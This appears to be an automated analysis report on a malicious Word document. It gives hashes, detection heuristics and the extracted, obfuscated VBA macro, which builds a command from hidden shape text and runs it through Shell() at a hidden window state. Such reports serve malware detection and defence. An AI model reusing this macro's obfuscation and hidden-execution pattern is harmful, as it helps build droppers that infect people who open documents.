Office (OLE) malware analysis — malicious · 2d5caba6f7f04cd2

MALICIOUS

Office (OLE)

86.6 KB Created: 2018-11-14 12:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: dc25b02f3d410bdc34394862da2a2381 SHA-1: 46117432056ecd8918f2c2a01157bf24c84b432e SHA-256: 2d5caba6f7f04cd29245bd72faa63f47964c98ce9c4b995bb7d4a8a134555d0a

242 Risk Score

Heuristics 7

ClamAV: Doc.Malware.Generic-6749861-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6749861-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8194 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8194 bytes
SHA-256: `676a15f5ca5d107e585e0994a563d10973328cd5953ae5fa06427df42073b6c1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "YMwzAFC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function JhwtqtVUjsX() Const UAptjJEt = 507391445 - 507391445 Dim WZmnCBBGa, mIfhziYv, ObBuX, oKvDBUpnZ mIfhziYv = Len(aBLOWuA) oKvDBUpnZ = "" For WZmnCBBGa = 1 To mIfhziYv oKvDBUpnZ = oKvDBUpnZ & (42 + ((ObBuX + 19) Mod 90)) If ObBuX >= 19 And ObBuX <= 54 Then oKvDBUpnZ = oKvDBUpnZ & (46 + ((ObBuX + 28) Mod 113)) Else oKvDBUpnZ = oKvDBUpnZ & (ObBuX) End If Next OmsQUVfOo = oKvDBUpnZ Dim wBzcprfzi, BiPDoVj, nbjaKbsSw, bmGBLfO BiPDoVj = Len(VrYIaPRPi) bmGBLfO = "" For wBzcprfzi = 1 To BiPDoVj bmGBLfO = bmGBLfO & (35 + ((nbjaKbsSw + 27) Mod 130)) If nbjaKbsSw >= 25 And nbjaKbsSw <= 67 Then bmGBLfO = bmGBLfO & (26 + ((nbjaKbsSw + 35) Mod 159)) Else bmGBLfO = bmGBLfO & (nbjaKbsSw) End If Next QXqVjX = bmGBLfO Dim XsYzT, otAsaiBU, vzVOd, sTNDBPqE otAsaiBU = Len(HBQTrZrfE) sTNDBPqE = "" For XsYzT = 1 To otAsaiBU sTNDBPqE = sTNDBPqE & (25 + ((vzVOd + 26) Mod 145)) If vzVOd >= 18 And vzVOd <= 78 Then sTNDBPqE = sTNDBPqE & (41 + ((vzVOd + 49) Mod 88)) Else sTNDBPqE = sTNDBPqE & (vzVOd) End If Next PuYOIOViY = sTNDBPqE Dim FDYTzVFEX, NjiTbpc, QlnDMnhzX, HvmWA NjiTbpc = Len(oznzfMwS) HvmWA = "" For FDYTzVFEX = 1 To NjiTbpc HvmWA = HvmWA & (15 + ((QlnDMnhzX + 29) Mod 149)) If QlnDMnhzX >= 12 And QlnDMnhzX <= 91 Then HvmWA = HvmWA & (47 + ((QlnDMnhzX + 14) Mod 173)) Else HvmWA = HvmWA & (QlnDMnhzX) End If Next CTYcDCql = HvmWA WjXuzYck = "" + UwoAkY + cjERRtw + Shapes(tvirT + btsBz + 1 + jimAh + ptGbTfq).TextFrame.ContainingRange + PQdUiOOa + iYrjMk Dim LFPSsGL, FphZwz, wfGlc, vFhCwjPFE FphZwz = Len(TZimM) vFhCwjPFE = "" For LFPSsGL = 1 To FphZwz vFhCwjPFE = vFhCwjPFE & (47 + ((wfGlc + 10) Mod 99)) If wfGlc >= 39 And wfGlc <= 76 Then vFhCwjPFE = vFhCwjPFE & (29 + ((wfGlc + 45) Mod 133)) Else vFhCwjPFE = vFhCwjPFE & (wfGlc) End If Next WFkEdJF = vFhCwjPFE Dim XjisRmcD, bQzvT, wdlTrWS, MzKaJw bQzvT = Len(uqDzSW) MzKaJw = "" For XjisRmcD = 1 To bQzvT MzKaJw = MzKaJw & (20 + ((wdlTrWS + 15) Mod 140)) If wdlTrWS >= 28 And wdlTrWS <= 63 Then MzKaJw = MzKaJw & (41 + ((wdlTrWS + 12) Mod 54)) Else MzKaJw = MzKaJw & (wdlTrWS) End If Next JBbKDuDa = MzKaJw adMbpzsmdTX = Shell(WjXuzYck + pZQAhQtX + AfNARL, UAptjJEt) Dim iHnklGri, FdvTkkCsw, XIUab, zldXinnZV FdvTkkCsw = Len(sfFcFb) zldXinnZV = "" For iHnklGri = 1 To FdvTkkCsw zldXinnZV = zldXinnZV & (12 + ((XIUab + 41) Mod 182)) If XIUab >= 10 And XIUab <= 77 Then zldXinnZV = zldXinnZV & (23 + ((XIUab + 17) Mod 117)) Else zldXinnZV = zldXinnZV & (XIUab) End If Next GVVOuU = zldXinnZV Dim fbtwZZicS, FFzpMikFV, ZikViM, qrknSVO FFzpMikFV = Len(VvsArRFw) qrknSVO = "" For fbtwZZicS = 1 To FFzpMikFV qrknSVO = qrknSVO & (37 + ((ZikViM + 25) Mod 168)) If ZikViM >= 45 And ZikViM <= 84 Then qrknSVO = qrknSVO & (17 + ((ZikViM + 34) Mod 198)) Else qrknSVO = qrknSVO & (ZikViM) End If Next RzrYNME = qrknSVO Dim qJFrzQDRf, ZhThU, dtAzjJEa, CjclzYhz ZhThU = Len(XfEzYuwb) CjclzYhz = "" For qJFrzQDRf = 1 To ZhThU CjclzYhz = CjclzYhz & (29 + ((dtAzjJEa + 12) Mod 172)) If dtAzjJEa >= 19 And dtAzjJEa <= 65 Then CjclzYhz = CjclzYhz & (34 + ((dtAzjJEa + 10) Mod 151)) Else ... (truncated)

SHA-256: 676a15f5ca5d107e585e0994a563d10973328cd5953ae5fa06427df42073b6c1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "YMwzAFC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JhwtqtVUjsX()
Const UAptjJEt = 507391445 - 507391445
   Dim WZmnCBBGa, mIfhziYv, ObBuX, oKvDBUpnZ
    mIfhziYv = Len(aBLOWuA)
    oKvDBUpnZ = ""
    For WZmnCBBGa = 1 To mIfhziYv
        oKvDBUpnZ = oKvDBUpnZ & (42 + ((ObBuX + 19) Mod 90))
        If ObBuX >= 19 And ObBuX <= 54 Then
            oKvDBUpnZ = oKvDBUpnZ & (46 + ((ObBuX + 28) Mod 113))
        Else
            oKvDBUpnZ = oKvDBUpnZ & (ObBuX)
        End If
    Next
OmsQUVfOo = oKvDBUpnZ

   Dim wBzcprfzi, BiPDoVj, nbjaKbsSw, bmGBLfO
    BiPDoVj = Len(VrYIaPRPi)
    bmGBLfO = ""
    For wBzcprfzi = 1 To BiPDoVj
        bmGBLfO = bmGBLfO & (35 + ((nbjaKbsSw + 27) Mod 130))
        If nbjaKbsSw >= 25 And nbjaKbsSw <= 67 Then
            bmGBLfO = bmGBLfO & (26 + ((nbjaKbsSw + 35) Mod 159))
        Else
            bmGBLfO = bmGBLfO & (nbjaKbsSw)
        End If
    Next
QXqVjX = bmGBLfO

   Dim XsYzT, otAsaiBU, vzVOd, sTNDBPqE
    otAsaiBU = Len(HBQTrZrfE)
    sTNDBPqE = ""
    For XsYzT = 1 To otAsaiBU
        sTNDBPqE = sTNDBPqE & (25 + ((vzVOd + 26) Mod 145))
        If vzVOd >= 18 And vzVOd <= 78 Then
            sTNDBPqE = sTNDBPqE & (41 + ((vzVOd + 49) Mod 88))
        Else
            sTNDBPqE = sTNDBPqE & (vzVOd)
        End If
    Next
PuYOIOViY = sTNDBPqE

   Dim FDYTzVFEX, NjiTbpc, QlnDMnhzX, HvmWA
    NjiTbpc = Len(oznzfMwS)
    HvmWA = ""
    For FDYTzVFEX = 1 To NjiTbpc
        HvmWA = HvmWA & (15 + ((QlnDMnhzX + 29) Mod 149))
        If QlnDMnhzX >= 12 And QlnDMnhzX <= 91 Then
            HvmWA = HvmWA & (47 + ((QlnDMnhzX + 14) Mod 173))
        Else
            HvmWA = HvmWA & (QlnDMnhzX)
        End If
    Next
CTYcDCql = HvmWA

WjXuzYck = "" + UwoAkY + cjERRtw + Shapes(tvirT + btsBz + 1 + jimAh + ptGbTfq).TextFrame.ContainingRange + PQdUiOOa + iYrjMk
   Dim LFPSsGL, FphZwz, wfGlc, vFhCwjPFE
    FphZwz = Len(TZimM)
    vFhCwjPFE = ""
    For LFPSsGL = 1 To FphZwz
        vFhCwjPFE = vFhCwjPFE & (47 + ((wfGlc + 10) Mod 99))
        If wfGlc >= 39 And wfGlc <= 76 Then
            vFhCwjPFE = vFhCwjPFE & (29 + ((wfGlc + 45) Mod 133))
        Else
            vFhCwjPFE = vFhCwjPFE & (wfGlc)
        End If
    Next
WFkEdJF = vFhCwjPFE

   Dim XjisRmcD, bQzvT, wdlTrWS, MzKaJw
    bQzvT = Len(uqDzSW)
    MzKaJw = ""
    For XjisRmcD = 1 To bQzvT
        MzKaJw = MzKaJw & (20 + ((wdlTrWS + 15) Mod 140))
        If wdlTrWS >= 28 And wdlTrWS <= 63 Then
            MzKaJw = MzKaJw & (41 + ((wdlTrWS + 12) Mod 54))
        Else
            MzKaJw = MzKaJw & (wdlTrWS)
        End If
    Next
JBbKDuDa = MzKaJw

adMbpzsmdTX = Shell(WjXuzYck + pZQAhQtX + AfNARL, UAptjJEt)
   Dim iHnklGri, FdvTkkCsw, XIUab, zldXinnZV
    FdvTkkCsw = Len(sfFcFb)
    zldXinnZV = ""
    For iHnklGri = 1 To FdvTkkCsw
        zldXinnZV = zldXinnZV & (12 + ((XIUab + 41) Mod 182))
        If XIUab >= 10 And XIUab <= 77 Then
            zldXinnZV = zldXinnZV & (23 + ((XIUab + 17) Mod 117))
        Else
            zldXinnZV = zldXinnZV & (XIUab)
        End If
    Next
GVVOuU = zldXinnZV

   Dim fbtwZZicS, FFzpMikFV, ZikViM, qrknSVO
    FFzpMikFV = Len(VvsArRFw)
    qrknSVO = ""
    For fbtwZZicS = 1 To FFzpMikFV
        qrknSVO = qrknSVO & (37 + ((ZikViM + 25) Mod 168))
        If ZikViM >= 45 And ZikViM <= 84 Then
            qrknSVO = qrknSVO & (17 + ((ZikViM + 34) Mod 198))
        Else
            qrknSVO = qrknSVO & (ZikViM)
        End If
    Next
RzrYNME = qrknSVO

   Dim qJFrzQDRf, ZhThU, dtAzjJEa, CjclzYhz
    ZhThU = Len(XfEzYuwb)
    CjclzYhz = ""
    For qJFrzQDRf = 1 To ZhThU
        CjclzYhz = CjclzYhz & (29 + ((dtAzjJEa + 12) Mod 172))
        If dtAzjJEa >= 19 And dtAzjJEa <= 65 Then
            CjclzYhz = CjclzYhz & (34 + ((dtAzjJEa + 10) Mod 151))
        Else
            
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.